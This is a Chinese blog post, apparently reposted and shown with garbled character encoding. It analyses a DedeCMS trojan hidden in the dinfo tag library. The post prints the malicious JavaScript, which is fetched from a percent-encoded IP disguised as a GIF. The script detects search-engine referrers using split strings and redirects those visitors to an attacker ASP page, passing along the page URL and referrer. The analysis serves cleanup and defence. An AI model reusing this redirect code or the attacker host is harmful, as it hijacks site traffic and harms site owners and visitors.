經(jīng)過(guò)一段時(shí)間摸索,發(fā)現(xiàn)這個(gè)標(biāo)簽{dede:dinfo}有問(wèn)題
做dedecms的人都知道,這個(gè)是一個(gè)自定義標(biāo)簽的調(diào)用方式,其源碼在:/include/taglib/dinfo.lib.php里面。于是打開(kāi)這個(gè)文件,看到如下代碼:
[代碼]php代碼:
>dede>>
系統(tǒng)默認(rèn)標(biāo)簽
全局標(biāo)記
V55,V56,V57
系統(tǒng)默認(rèn)標(biāo)簽
{dede:dinfo /}
>>dede>>*/
function lib_dinfo()
{
global $dsql,$envs;
$revalue = '';
return $revalue;
}
剛開(kāi)始也沒(méi)有看出什么問(wèn)題,就是一段js代碼,然后引用了一個(gè)圖片,不過(guò)訪問(wèn)下這個(gè)圖片地址就知道了,在瀏覽器中輸入這個(gè)地址:http://%31%31%38%2e%32%34%34%2e%32%31%35%2e%32%31%33/images/page_bg.gif
能看到如下代碼:
[代碼]js代碼:
GID89a="";
var s=document.referrer;
var str=window.location.href;
if(s.indexOf("go"+"o"+"gle")>0 || s.indexOf("b"+"ai"+"du")>0 || s.indexOf("y"+"ahoo")>0 || s.indexOf("s"+"ogou")>0 || s.indexOf("bing")>0 || s.indexOf("360")>0 || s.indexOf("s"+"os"+"o")>0 || s.indexOf("youdao")>0 )
window.location.href="http://118.244.215.213/Images/a2.asp?cpy="+str+"&kecy="+s;
怎么樣,看出問(wèn)題來(lái)了吧?
簡(jiǎn)單解說(shuō)一下:
[代碼]js代碼:
if(s.indexOf("go"+"o"+"gle")>0 || s.indexOf("b"+"ai"+"du")>0 || s.indexOf("y"+"ahoo")>0 || s.indexOf("s"+"ogou")>0 || s.indexOf("bing")>0 || s.indexOf("360")>0 || s.indexOf("s"+"os"+"o")>0 || s.indexOf("youdao")>0 )
這里就是判斷來(lái)路,如果來(lái)源是:google、百度、yahoo、sogou、bing、360、soso、youdao,就跳轉(zhuǎn)到下面這個(gè)地址:
[代碼]js代碼:
http://118.244.215.213/Images/a2.asp?cpy="+str+"&kecy="+s;
版權(quán)聲明: 本站資源均來(lái)自互聯(lián)網(wǎng)或會(huì)員發(fā)布,如果侵犯了您的權(quán)益請(qǐng)與我們聯(lián)系,我們將在24小時(shí)內(nèi)刪除!謝謝!
轉(zhuǎn)載請(qǐng)注明: dedecms織夢(mèng)清除快照劫持木馬